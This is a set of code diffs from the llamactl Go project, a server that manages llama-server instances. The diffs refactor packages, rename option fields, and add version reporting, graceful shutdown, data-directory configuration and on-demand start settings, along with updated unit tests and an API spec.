llamactl.CreateInstanceOptions:
instance.CreateInstanceOptions:
properties:
alias:
type: string
@@ -66,7 +66,6 @@ definitions:
device_draft:
type: string
draft_max:
description: Speculative decoding params
type: integer
draft_min:
type: integer
@@ -203,7 +202,7 @@ definitions:
no_cont_batching:
type: boolean
no_context_shift:
description: Server/Example-specific params
description: Example-specific params
type: boolean
no_escape:
type: boolean
@@ -251,9 +250,9 @@ definitions:
type: integer
presence_penalty:
type: number
priority:
prio:
type: integer
priority_batch:
prio_batch:
type: integer
props:
type: boolean
@@ -301,7 +300,7 @@ definitions:
type: string
ssl_key_file:
type: string
temperature:
temp:
type: number
tensor_split:
type: string
@@ -345,7 +344,7 @@ definitions:
yarn_orig_ctx:
type: integer
type: object
llamactl.Instance:
instance.Process:
properties:
created:
description: Creation time
@@ -356,7 +355,7 @@ definitions:
description: Status
type: boolean
type: object
llamactl.OpenAIInstance:
server.OpenAIInstance:
properties:
created:
type: integer
@@ -367,11 +366,11 @@ definitions:
owned_by:
type: string
type: object
llamactl.OpenAIListInstancesResponse:
server.OpenAIListInstancesResponse:
properties:
data:
items:
$ref: '#/definitions/llamactl.OpenAIInstance'
$ref: '#/definitions/server.OpenAIInstance'
type: array
object:
type: string
@@ -393,7 +392,7 @@ paths:
description: List of instances
schema:
items:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
type: array
"500":
description: Internal Server Error
@@ -441,7 +440,7 @@ paths:
"200":
description: Instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -470,12 +469,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"201":
description: Created instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid request body
schema:
@@ -504,12 +503,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"200":
description: Updated instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -627,7 +626,7 @@ paths:
"200":
description: Restarted instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -654,7 +653,7 @@ paths:
"200":
description: Started instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -681,7 +680,7 @@ paths:
"200":
description: Stopped instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -777,7 +776,7 @@ paths:
"200":
description: List of OpenAI-compatible instances
schema:
$ref: '#/definitions/llamactl.OpenAIListInstancesResponse'
$ref: '#/definitions/server.OpenAIListInstancesResponse'
"500":
description: Internal Server Error
schema:
@@ -787,4 +786,21 @@ paths:
summary: List instances in OpenAI-compatible format
tags:
- openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
swagger: "2.0"


@@ -2,11 +2,20 @@ package main
import (
"fmt"
llamactl "llamactl/pkg"
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"net/http"
"os"
"os/signal"
"syscall"
)
// version is set at build time using -ldflags "-X main.version=1.0.0"
var version string = "unknown"
var commitHash string = "unknown"
var buildTime string = "unknown"
// @title llamactl API
// @version 1.0
// @description llamactl is a control server for managing Llama Server instances.
@@ -15,29 +24,76 @@ import (
// @basePath /api/v1
func main() {
config, err := llamactl.LoadConfig("")
// --version flag to print the version
if len(os.Args) > 1 && os.Args[1] == "--version" {
fmt.Printf("llamactl version: %s\n", version)
fmt.Printf("Commit hash: %s\n", commitHash)
fmt.Printf("Build time: %s\n", buildTime)
return
}
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
}
// Create the log directory if it doesn't exist
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
if err != nil {
fmt.Printf("Error creating log directory: %v\n", err)
return
// Set version information
cfg.Version = version
cfg.CommitHash = commitHash
cfg.BuildTime = buildTime
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
}
}
// Initialize the instance manager
instanceManager := llamactl.NewInstanceManager(config.Instances)
instanceManager := manager.NewInstanceManager(cfg.Instances)
// Create a new handler with the instance manager
handler := llamactl.NewHandler(instanceManager, config)
handler := server.NewHandler(instanceManager, cfg)
// Setup the router with the handler
r := llamactl.SetupRouter(handler)
r := server.SetupRouter(handler)
// Start the server with the router
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
// Handle graceful shutdown
stop := make(chan os.Signal, 1)
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
server := http.Server{
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
Handler: r,
}
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
}
}()
// Wait for shutdown signal
<-stop
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}
// Wait for all instances to stop
instanceManager.Shutdown()
fmt.Println("Exiting llamactl.")
}
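Because `version`, `commitHash`, and `buildTime` default to "unknown", release builds are expected to inject them via `-ldflags`; a sketch (the release workflow's exact flags are not shown here):
```bash
# Inject version metadata at build time, then verify with --version
go build -o llamactl \
  -ldflags "-X main.version=v1.0.0 \
            -X main.commitHash=$(git rev-parse --short HEAD) \
            -X main.buildTime=$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
  ./cmd/server
./llamactl --version
```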

docs/images/screenshot.png Normal file (binary, 47 KiB; not shown)


@@ -1,4 +1,4 @@
package llamactl
package llamacpp
import (
"encoding/json"
@@ -15,12 +15,12 @@ type LlamaServerOptions struct {
CPUMask string `json:"cpu_mask,omitempty"`
CPURange string `json:"cpu_range,omitempty"`
CPUStrict int `json:"cpu_strict,omitempty"`
Priority int `json:"priority,omitempty"`
Prio int `json:"prio,omitempty"`
Poll int `json:"poll,omitempty"`
CPUMaskBatch string `json:"cpu_mask_batch,omitempty"`
CPURangeBatch string `json:"cpu_range_batch,omitempty"`
CPUStrictBatch int `json:"cpu_strict_batch,omitempty"`
PriorityBatch int `json:"priority_batch,omitempty"`
PrioBatch int `json:"prio_batch,omitempty"`
PollBatch int `json:"poll_batch,omitempty"`
CtxSize int `json:"ctx_size,omitempty"`
Predict int `json:"predict,omitempty"`
@@ -83,7 +83,7 @@ type LlamaServerOptions struct {
Seed int `json:"seed,omitempty"`
SamplingSeq string `json:"sampling_seq,omitempty"`
IgnoreEOS bool `json:"ignore_eos,omitempty"`
Temperature float64 `json:"temperature,omitempty"`
Temperature float64 `json:"temp,omitempty"`
TopK int `json:"top_k,omitempty"`
TopP float64 `json:"top_p,omitempty"`
MinP float64 `json:"min_p,omitempty"`
@@ -110,7 +110,7 @@ type LlamaServerOptions struct {
JSONSchema string `json:"json_schema,omitempty"`
JSONSchemaFile string `json:"json_schema_file,omitempty"`
// Server/Example-specific params
// Example-specific params
NoContextShift bool `json:"no_context_shift,omitempty"`
Special bool `json:"special,omitempty"`
NoWarmup bool `json:"no_warmup,omitempty"`
@@ -150,17 +150,15 @@ type LlamaServerOptions struct {
NoPrefillAssistant bool `json:"no_prefill_assistant,omitempty"`
SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"`
LoraInitWithoutApply bool `json:"lora_init_without_apply,omitempty"`
// Speculative decoding params
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
// Audio/TTS params
ModelVocoder string `json:"model_vocoder,omitempty"`
@@ -199,62 +197,75 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// Handle alternative field names
fieldMappings := map[string]string{
// Official llama-server short forms from the documentation
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict, --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"s": "seed", // -s, --seed SEED
"temp": "temperature", // --temp N
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
// Common params
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict N
"n-predict": "predict", // --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"n-gpu-layers": "gpu_layers", // --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"log-verbose": "verbose", // --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"log-verbosity": "verbosity", // --log-verbosity N
// Sampling params
"s": "seed", // -s, --seed SEED
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
// Example-specific params
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"embeddings": "embedding", // --embeddings
"rerank": "reranking", // --reranking
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"draft": "draft-max", // -draft, --draft-max N
"draft-n": "draft-max", // --draft-n-max N
"draft-n-min": "draft_min", // --draft-n-min N
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"n-gpu-layers-draft": "gpu_layers_draft", // --n-gpu-layers-draft N
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
}
// Process alternative field names


@@ -1,17 +1,16 @@
package llamactl_test
package llamacpp_test
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends/llamacpp"
"reflect"
"slices"
"testing"
llamactl "llamactl/pkg"
)
func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options llamactl.LlamaServerOptions
options llamacpp.LlamaServerOptions
expected []string
excluded []string
}{
{
name: "verbose true",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
},
expected: []string{"--verbose"},
},
{
name: "verbose false",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: false,
},
excluded: []string{"--verbose"},
},
{
name: "multiple booleans",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
FlashAttn: true,
Mlock: false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
}
func TestBuildCommandArgs_NumericFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 8080,
Threads: 4,
CtxSize: 2048,
@@ -110,13 +109,13 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
args := options.BuildCommandArgs()
expectedPairs := map[string]string{
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temperature": "0.7",
"--top-k": "40",
"--top-p": "0.9",
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temp": "0.7",
"--top-k": "40",
"--top-p": "0.9",
}
for flag, expectedValue := range expectedPairs {
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
}
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 0, // Should be excluded
Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
}
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
}
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args
}
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
// Test snake_case to kebab-case conversion
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
CtxSize: 4096,
GPULayers: 32,
ThreadsBatch: 2,
@@ -232,10 +231,10 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"verbose": true,
"ctx_size": 4096,
"gpu_layers": 32,
"temperature": 0.7
"temp": 0.7
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct {
name string
jsonData string
checkFn func(llamactl.LlamaServerOptions) error
checkFn func(llamacpp.LlamaServerOptions) error
}{
{
name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
}
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "context size alternatives",
jsonData: `{"c": 2048}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
}
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "temperature alternatives",
jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
}
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil {
t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
"dry_sequence_breaker": [".", "!", "?"]
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)


@@ -1,4 +1,4 @@
package llamactl
package config
import (
"os"
@@ -10,11 +10,14 @@ import (
"gopkg.in/yaml.v3"
)
// Config represents the configuration for llamactl
type Config struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
@@ -37,8 +40,17 @@ type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where instance logs will be stored
LogDirectory string `yaml:"log_directory"`
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
DataDir string `yaml:"data_dir"`
// Instance config directory override
InstancesDir string `yaml:"configs_dir"`
// Logs directory override
LogsDir string `yaml:"logs_dir"`
// Automatically create the data directory if it doesn't exist
AutoCreateDirs bool `yaml:"auto_create_dirs"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
@@ -54,6 +66,15 @@ type InstancesConfig struct {
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
}
// AuthConfig contains authentication settings
@@ -76,9 +97,9 @@ type AuthConfig struct {
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (Config, error) {
func LoadConfig(configPath string) (AppConfig, error) {
// 1. Start with defaults
cfg := Config{
cfg := AppConfig{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
@@ -86,13 +107,19 @@ func LoadConfig(configPath string) (Config, error) {
EnableSwagger: false,
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/llamactl",
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
},
Auth: AuthConfig{
RequireInferenceAuth: true,
@@ -114,7 +141,7 @@ func LoadConfig(configPath string) (Config, error) {
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *Config, configPath string) error {
func loadConfigFile(cfg *AppConfig, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
@@ -138,7 +165,7 @@ func loadConfigFile(cfg *Config, configPath string) error {
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *Config) {
func loadEnvVars(cfg *AppConfig) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
@@ -157,15 +184,28 @@ func loadEnvVars(cfg *Config) {
}
}
// Data config
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
cfg.Instances.DataDir = dataDir
}
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
cfg.Instances.InstancesDir = instancesDir
}
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
cfg.Instances.LogsDir = logsDir
}
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
if b, err := strconv.ParseBool(autoCreate); err == nil {
cfg.Instances.AutoCreateDirs = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
cfg.Instances.LogDirectory = logDir
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
@@ -189,6 +229,21 @@ func loadEnvVars(cfg *Config) {
cfg.Instances.DefaultRestartDelay = seconds
}
}
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
@@ -231,64 +286,63 @@ func ParsePortRange(s string) [2]int {
return [2]int{0, 0} // Invalid format
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
case "windows":
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
return filepath.Join(programData, "llamactl")
}
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
return filepath.Join(localAppData, "llamactl")
}
return "C:\\ProgramData\\llamactl" // Final fallback
case "darwin":
// For macOS, use user's Application Support directory
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
}
return "/usr/local/var/llamactl" // Fallback
default:
// Linux and other Unix-like systems
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, ".local", "share", "llamactl")
}
return "/var/lib/llamactl" // Final fallback
}
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Current directory (cross-platform)
locations = append(locations,
"./llamactl.yaml",
"./config.yaml",
)
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA and ProgramData
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
}
